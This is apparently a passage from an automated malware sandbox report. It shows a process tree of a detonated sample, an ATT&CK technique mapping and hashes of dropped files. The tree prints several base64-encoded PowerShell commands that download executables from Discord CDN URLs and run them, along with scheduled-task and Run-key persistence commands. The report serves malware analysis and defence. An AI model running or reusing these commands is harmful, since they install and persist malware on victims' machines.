                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAYgB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANwA4ADAANAAwADYAMgAzADQAOAA5ADIAMgA0ADcAOQA0AC8AMQAwADcAOAAwADQAMQAzADAAMgAwADEAMAAxADgAMwA3ADEAMQAvAFAAcgBvAGMAZQBzAHMARABhAHQAYQAuAGUAeABlACcALAAgADwAIwB3AHUAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAbABrACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAYQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAYgBiADgALgBlAHgAZQAnACkAKQA8ACMAbQBpAGMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbQBiAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAbABhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAYgBiADgALgBlAHgAZQAnACkAPAAjAHMAdwBhACMAPgA="
                          6⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4264
                          • C:\Users\Admin\AppData\Roaming\bbb8.exe
                            "C:\Users\Admin\AppData\Roaming\bbb8.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:780
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              #cmd
                              8⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3908
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\9.exe
                      4⤵
                        PID:3376
                        • C:\Users\Admin\AppData\Local\Temp\9.exe
                          C:\Users\Admin\AppData\Local\Temp\9.exe
                          5⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          PID:1104
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAbgBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA3ADgAMAA0ADAANgAyADMANAA4ADkAMgAyADQANwA5ADQALwAxADAANwA4ADAANAAxADMANAA4ADUANwAxADEANAA4ADQAMgAxAC8AUwB5AHMAdABlAG0AUgBlAHMALgBlAHgAZQAnACwAIAA8ACMAcgBxAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGYAbQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGIAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiAGIAYgAxADAALgBlAHgAZQAnACkAKQA8ACMAZgBwAHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaAB4AHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAZwBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAYgBiADEAMAAuAGUAeABlACcAKQA8ACMAZQBqAHEAIwA+AA=="
                            6⤵
                            • Blocklisted process makes network request
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1388
                            • C:\Users\Admin\AppData\Roaming\bbb10.exe
                              "C:\Users\Admin\AppData\Roaming\bbb10.exe"
                              7⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:2388
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd" /C schtasks /create /tn \SystemRes /tr "C:\Users\Admin\AppData\Roaming\SystemRes\SystemRes.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                8⤵
                                  PID:1212
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /create /tn \SystemRes /tr "C:\Users\Admin\AppData\Roaming\SystemRes\SystemRes.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                    9⤵
                                    • Creates scheduled task(s)
                                    PID:4700
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  #cmd
                                  8⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4648
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemRes';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemRes' -Value '"C:\Users\Admin\AppData\Roaming\SystemRes\SystemRes.exe"' -PropertyType 'String'
                                  8⤵
                                  • Adds Run key to start application
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1416
                        • C:\Windows\system32\cmd.exe
                          "cmd" /C C:\Users\Admin\AppData\Local\Temp\10.exe
                          4⤵
                            PID:1840
                            • C:\Users\Admin\AppData\Local\Temp\10.exe
                              C:\Users\Admin\AppData\Local\Temp\10.exe
                              5⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              PID:1476
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAaQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADIANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA3ADgAMAA0ADAANgAyADMANAA4ADkAMgAyADQANwA5ADQALwAxADAANwA4ADAANAAxADMANgA4ADYAOAAyADgAMwA2ADAANAA4AC8AbwBwAGkAbABpAGwAZQBlAGUAbwAuAGUAeABlACcALAAgADwAIwBoAHkAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAZgBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAcwBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAYgBiADEAMQAuAGUAeABlACcAKQApADwAIwBwAG4AdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAHgAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBwAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYgBiAGIAMQAxAC4AZQB4AGUAJwApADwAIwBlAGcAZQAjAD4A"
                                6⤵
                                • Blocklisted process makes network request
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1144
                                • C:\Users\Admin\AppData\Roaming\bbb11.exe
                                  "C:\Users\Admin\AppData\Roaming\bbb11.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4032
                          • C:\Windows\system32\cmd.exe
                            "cmd" /C C:\Users\Admin\AppData\Local\Temp\11.exe
                            4⤵
                              PID:4844
                              • C:\Users\Admin\AppData\Local\Temp\11.exe
                                C:\Users\Admin\AppData\Local\Temp\11.exe
                                5⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                PID:3964
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAcAB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADMANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA3ADgAMAA0ADAANgAyADMANAA4ADkAMgAyADQANwA5ADQALwAxADAANwA4ADAANAAxADYAOQAxADQANQA5ADYAOQA0ADYANgAzAC8AbABpAGwAaQBhAG4AZABvAHIAawBlAHIALgBlAHgAZQAnACwAIAA8ACMAbgBmAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AHMAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB5AGUAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiAGIAYgAxADIALgBlAHgAZQAnACkAKQA8ACMAYgBiAHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBtAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAbQB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGIAYgBiADEAMgAuAGUAeABlACcAKQA8ACMAdgBkAGcAIwA+AA=="
                                  6⤵
                                  • Blocklisted process makes network request
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3772
                      • C:\Windows\system32\OpenWith.exe
                        C:\Windows\system32\OpenWith.exe -Embedding
                        1⤵
                        • Modifies registry class
                        • Suspicious use of SetWindowsHookEx
                        PID:408
                      • C:\Users\Admin\AppData\Roaming\bbb.exe
                        C:\Users\Admin\AppData\Roaming\bbb.exe
                        1⤵
                        • Executes dropped EXE
                        PID:3952

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Execution

                      Scheduled Task

                      1
                      T1053

                      Persistence

                      Registry Run Keys / Startup Folder

                      1
                      T1060

                      Scheduled Task

                      1
                      T1053

                      Privilege Escalation

                      Scheduled Task

                      1
                      T1053

                      Defense Evasion

                      Modify Registry

                      1
                      T1112

                      Credential Access

                      Credentials in Files

                      2
                      T1081

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      2
                      T1005

                      Command and Control

                      Web Service

                      1
                      T1102

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\4.exe.log
                        Filesize

                        226B

                        MD5

                        28d7fcc2b910da5e67ebb99451a5f598

                        SHA1

                        a5bf77a53eda1208f4f37d09d82da0b9915a6747

                        SHA256

                        2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

                        SHA512

                        2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                        Filesize

                        3KB

                        MD5

                        556084f2c6d459c116a69d6fedcc4105

                        SHA1

                        633e89b9a1e77942d822d14de6708430a3944dbc

                        SHA256

                        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                        SHA512

                        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
                        Filesize

                        425B

                        MD5

                        4eaca4566b22b01cd3bc115b9b0b2196

                        SHA1

                        e743e0792c19f71740416e7b3c061d9f1336bf94

                        SHA256

                        34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

                        SHA512

                        bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bbb2.exe.log
                        Filesize

                        1KB

                        MD5

                        8ec831f3e3a3f77e4a7b9cd32b48384c

                        SHA1

                        d83f09fd87c5bd86e045873c231c14836e76a05c

                        SHA256

                        7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

                        SHA512

                        26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                        Filesize

                        2KB

                        MD5

                        9faf6f9cd1992cdebfd8e34b48ea9330

                        SHA1

                        ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

                        SHA256

                        0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

                        SHA512

                        05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        33e9dd1bc41e70c4fbdf04b85cf36ff4

                        SHA1

                        0433625fae735abc2f11249456e212dfca1473a9

                        SHA256

                        f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

                        SHA512

                        d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        6b33cff2c64571ee8b1cf14f157f317f

                        SHA1

                        ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

                        SHA256

                        0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

                        SHA512

                        61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        33e9dd1bc41e70c4fbdf04b85cf36ff4

                        SHA1

                        0433625fae735abc2f11249456e212dfca1473a9

                        SHA256

                        f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

                        SHA512

                        d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        027f752ee0cbbc3ac151148c1292faee

                        SHA1

                        79a3e6fd6e0a6db95f8d45eb761a629c260f937c

                        SHA256

                        0359fc2210c62b1c352b0583904cb485b6310146c4f47b6838b08350bd25a1da

                        SHA512

                        0db6ef15ed79c8dea5ab0596c6221b396b63164ba8250c5cab384e4e5664d72108cdc87b0a7318e56a1ed9b99276bf8cc170130bda85c54534f86c6eb2420a97

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        027f752ee0cbbc3ac151148c1292faee

                        SHA1

                        79a3e6fd6e0a6db95f8d45eb761a629c260f937c

                        SHA256

                        0359fc2210c62b1c352b0583904cb485b6310146c4f47b6838b08350bd25a1da

                        SHA512

                        0db6ef15ed79c8dea5ab0596c6221b396b63164ba8250c5cab384e4e5664d72108cdc87b0a7318e56a1ed9b99276bf8cc170130bda85c54534f86c6eb2420a97

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        027f752ee0cbbc3ac151148c1292faee

                        SHA1

                        79a3e6fd6e0a6db95f8d45eb761a629c260f937c

                        SHA256

                        0359fc2210c62b1c352b0583904cb485b6310146c4f47b6838b08350bd25a1da

                        SHA512

                        0db6ef15ed79c8dea5ab0596c6221b396b63164ba8250c5cab384e4e5664d72108cdc87b0a7318e56a1ed9b99276bf8cc170130bda85c54534f86c6eb2420a97

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        e48aa969afe288ca956d579c869cb78b

                        SHA1

                        3cf9f9450e8fa846c8e731e66f85041624e98541

                        SHA256

                        290aab67e5610ce1c517e843cefb2e22bfb602f659595a9c6cf8511da46d86b2

                        SHA512

                        35fed558bf712def61ff7e959abbded2ea7c6cf030eea80abb50d3a153768dcf728c386b2f7004c84991b141c6fe08a2590519f5177304a7f1e64f594ec05005

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        6b33cff2c64571ee8b1cf14f157f317f

                        SHA1

                        ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

                        SHA256

                        0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

                        SHA512

                        61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        8ba5d952f25a1798aa5d654bb81e7293

                        SHA1

                        80829acaa517d101d91791f6164455e30e5fa7d1

                        SHA256

                        2edfe72fa4c3b7597707ee227162d89c1808d9392547e1d24e5691c7fbee5729

                        SHA512

                        98a19b96d1b82c0c7b21d53d49e7695f55e8bba7a66c67747af149b5fb4f7dc78ee8613853501642c17064555056591db364449b26ec4a285bb5e505106f106d

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        daac9c13da6de6812b488fe70af0184c

                        SHA1

                        1ec08d3ce601c8912c1bb293d6d5bc750491e186

                        SHA256

                        a36e315cb51ad4e3a8fc69ae369b1bdbc092554cef27b44a012c059d0184a8b5

                        SHA512

                        5b634a6c7b4f9d55754ca6c49be18ee4757e1aa5665084b2b1f87e4fc91c5e751ec198e636078aaecaafce416349fae990da0c2f12d22aa6d77dfb56032e8d8d

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        33e9dd1bc41e70c4fbdf04b85cf36ff4

                        SHA1

                        0433625fae735abc2f11249456e212dfca1473a9

                        SHA256

                        f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

                        SHA512

                        d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        33e9dd1bc41e70c4fbdf04b85cf36ff4

                        SHA1

                        0433625fae735abc2f11249456e212dfca1473a9

                        SHA256

                        f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

                        SHA512

                        d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

                      • C:\Users\Admin\AppData\Local\Temp\0.exe
                        Filesize

                        5KB

                        MD5

                        1409d110e78f6f48ae0ce55f4c951bc2

                        SHA1

                        692eed2de0642c4e590278239452567d65c44066

                        SHA256

                        1d411cbd60c6d2768d3ae01e25a90c5fa7e66331db3aed50cf8bf5d14e852a36

                        SHA512

                        9da2e8c3a553bc03b78390de9a77e6d8a5fb9f15c30afa4611b27e963e8a2b4a3dcd301db7504b7e449e34efec5ef5bc39a4d76b4d9bd16b3883e46b69d42bba

                      • C:\Users\Admin\AppData\Local\Temp\0.exe
                        Filesize

                        5KB

                        MD5

                        1409d110e78f6f48ae0ce55f4c951bc2

                        SHA1

                        692eed2de0642c4e590278239452567d65c44066

                        SHA256

                        1d411cbd60c6d2768d3ae01e25a90c5fa7e66331db3aed50cf8bf5d14e852a36

                        SHA512

                        9da2e8c3a553bc03b78390de9a77e6d8a5fb9f15c30afa4611b27e963e8a2b4a3dcd301db7504b7e449e34efec5ef5bc39a4d76b4d9bd16b3883e46b69d42bba

                      • C:\Users\Admin\AppData\Local\Temp\1.exe
                        Filesize

                        5KB

                        MD5

                        88657570f35a6dadeae126eb73086a3d

                        SHA1

                        2fdf71d99406c432e09311c8654132fcdf7555b2

                        SHA256

                        e447d166d331c9e13a59f755898dcc043deabcbde432e5d6c1b03f7f4246e70e

                        SHA512

                        555dbcf87d3409fc171812387b485d7c9d8ec958f1e589e6494f3611a3c532cd971b84c85afad06a90f4ab70d97c53c787f6c1ac996466a17a30a288e108611a

                      • C:\Users\Admin\AppData\Local\Temp\1.exe
                        Filesize

                        5KB

                        MD5

                        88657570f35a6dadeae126eb73086a3d

                        SHA1

                        2fdf71d99406c432e09311c8654132fcdf7555b2

                        SHA256

                        e447d166d331c9e13a59f755898dcc043deabcbde432e5d6c1b03f7f4246e70e

                        SHA512

                        555dbcf87d3409fc171812387b485d7c9d8ec958f1e589e6494f3611a3c532cd971b84c85afad06a90f4ab70d97c53c787f6c1ac996466a17a30a288e108611a

                      • C:\Users\Admin\AppData\Local\Temp\10.exe
                        Filesize

                        5KB

                        MD5

                        10dcd990dde52423ac6cbe1505f7ea8b

                        SHA1

                        43ccf3754b873e031a0e91d018de4825c14a45d7

                        SHA256

                        80db3f4d7b286d0705be86da044ee42fba67de9afbde1baddfe3003f59437926

                        SHA512

                        24a94cedf858381ee7a56cf138f976ab8fdc679ae36dc2ab1290778ac9c19a918b8c690145f19f825973e5ce086a8d9b394f981ca26b121bd249ef7a230b3f66

                      • C:\Users\Admin\AppData\Local\Temp\10.exe
                        Filesize

                        5KB

                        MD5

                        10dcd990dde52423ac6cbe1505f7ea8b

                        SHA1

                        43ccf3754b873e031a0e91d018de4825c14a45d7

                        SHA256

                        80db3f4d7b286d0705be86da044ee42fba67de9afbde1baddfe3003f59437926

                        SHA512

                        24a94cedf858381ee7a56cf138f976ab8fdc679ae36dc2ab1290778ac9c19a918b8c690145f19f825973e5ce086a8d9b394f981ca26b121bd249ef7a230b3f66

                      • C:\Users\Admin\AppData\Local\Temp\11.exe
                        Filesize

                        5KB

                        MD5

                        38e2e14a92a631653d5d0a10fbf473c4

                        SHA1

                        a6e08073c7ffcdbd05a0790501fb36c691dd3dbf

                        SHA256

                        a91758bdfff8f87768300e3c66b3a040a9b24c6e457253d01bdc7ac7a9bed780

                        SHA512

                        7425a14795af69fee137483e6324186cb747c30ecc5d771a9726b597c980fa8e1bb77f1020cfbcaa6ae51cc4adb1a1083965c1623708c449e6cb1cfea2da78cf

                      • C:\Users\Admin\AppData\Local\Temp\11.exe
                        Filesize

                        5KB

                        MD5

                        38e2e14a92a631653d5d0a10fbf473c4

                        SHA1

                        a6e08073c7ffcdbd05a0790501fb36c691dd3dbf

                        SHA256

                        a91758bdfff8f87768300e3c66b3a040a9b24c6e457253d01bdc7ac7a9bed780

                        SHA512

                        7425a14795af69fee137483e6324186cb747c30ecc5d771a9726b597c980fa8e1bb77f1020cfbcaa6ae51cc4adb1a1083965c1623708c449e6cb1cfea2da78cf

                      • C:\Users\Admin\AppData\Local\Temp\2.exe
                        Filesize

                        6KB

                        MD5

                        84829a8d33e8c9442e6b3c82ddcef523

                        SHA1

                        d6d62018de6c2274ec0d58da600955c167afad1e

                        SHA256

                        7930e07ca921c0b43fd0fd267298318beb630fbe12a53b3ffe71701f8b2d5309

                        SHA512

                        67e00486db1d0d13e2ea7fc882398db850638ca3240f9576d2bf2c3251d1e05bf4d351d74ee2a65741178c16299684d80fbd91f41a1005a00bdbfc89f6492587

                      • C:\Users\Admin\AppData\Local\Temp\2.exe
                        Filesize

                        6KB

                        MD5

                        84829a8d33e8c9442e6b3c82ddcef523

                        SHA1

                        d6d62018de6c2274ec0d58da600955c167afad1e

                        SHA256

                        7930e07ca921c0b43fd0fd267298318beb630fbe12a53b3ffe71701f8b2d5309

                        SHA512

                        67e00486db1d0d13e2ea7fc882398db850638ca3240f9576d2bf2c3251d1e05bf4d351d74ee2a65741178c16299684d80fbd91f41a1005a00bdbfc89f6492587

                      • C:\Users\Admin\AppData\Local\Temp\3.exe
                        Filesize

                        6KB

                        MD5

                        33e269a9c4ad3dce993b6026c9633d28

                        SHA1

                        17965de63cb17e8a7f2c053db36fd47c73379d98

                        SHA256

                        6b489718c913136d151f94e6833b9f08f70fafc3d822c65696fa873fe18be976

                        SHA512

                        a63b3fdcf409fbc1d716a151e6a84ad90d8362378c6312299d00b82d1d5fc198d7c72b09dae3db5b8ef3608454976289cbdabb721c6870183d47486b8716b97b

                      • C:\Users\Admin\AppData\Local\Temp\3.exe
                        Filesize

                        6KB

                        MD5

                        33e269a9c4ad3dce993b6026c9633d28

                        SHA1

                        17965de63cb17e8a7f2c053db36fd47c73379d98

                        SHA256

                        6b489718c913136d151f94e6833b9f08f70fafc3d822c65696fa873fe18be976

                        SHA512

                        a63b3fdcf409fbc1d716a151e6a84ad90d8362378c6312299d00b82d1d5fc198d7c72b09dae3db5b8ef3608454976289cbdabb721c6870183d47486b8716b97b

                      • C:\Users\Admin\AppData\Local\Temp\4.exe
                        Filesize

                        5KB

                        MD5

                        88ffbb9b2d293935289a8986390b77ba

                        SHA1

                        633204310dd4cb89016efe0144705be9ae34fd5b

                        SHA256

                        37bbead0fb47cf6f2ec172e5158e76534549d43fb3d4628ad1edc549fbedd3a5

                        SHA512

                        496501c778b671d48edfdea140f68db1a3afd31db64d5cf38a35466a86c42c124de43b967401d445adac32c3709d78e390682a02b00f7e7a97d7b418fead81d6

                      • C:\Users\Admin\AppData\Local\Temp\4.exe
                        Filesize

                        5KB

                        MD5

                        88ffbb9b2d293935289a8986390b77ba

                        SHA1

                        633204310dd4cb89016efe0144705be9ae34fd5b

                        SHA256

                        37bbead0fb47cf6f2ec172e5158e76534549d43fb3d4628ad1edc549fbedd3a5

                        SHA512

                        496501c778b671d48edfdea140f68db1a3afd31db64d5cf38a35466a86c42c124de43b967401d445adac32c3709d78e390682a02b00f7e7a97d7b418fead81d6

                      • C:\Users\Admin\AppData\Local\Temp\5.exe
                        Filesize

                        5KB

                        MD5

                        2ab45febc31b7cfa482bc47a52fb4413

                        SHA1

                        dfffa40b9b8ea4a5dc17dc0a9e5f27b287cb64b6

                        SHA256

                        0e4ab53de5f488509a7725d85e510061f159c8419d638a7c6af835a4a436144e

                        SHA512

                        e0e45726652568edde9fc086bab502f7590ee524ee3045499f219178489cfa0ca9d7785240a203cd9316bb80e2296042942dc9b3782fa7be0eb1e2ce601956f2

                      • C:\Users\Admin\AppData\Local\Temp\5.exe
                        Filesize

                        5KB

                        MD5

                        2ab45febc31b7cfa482bc47a52fb4413

                        SHA1

                        dfffa40b9b8ea4a5dc17dc0a9e5f27b287cb64b6

                        SHA256

                        0e4ab53de5f488509a7725d85e510061f159c8419d638a7c6af835a4a436144e

                        SHA512

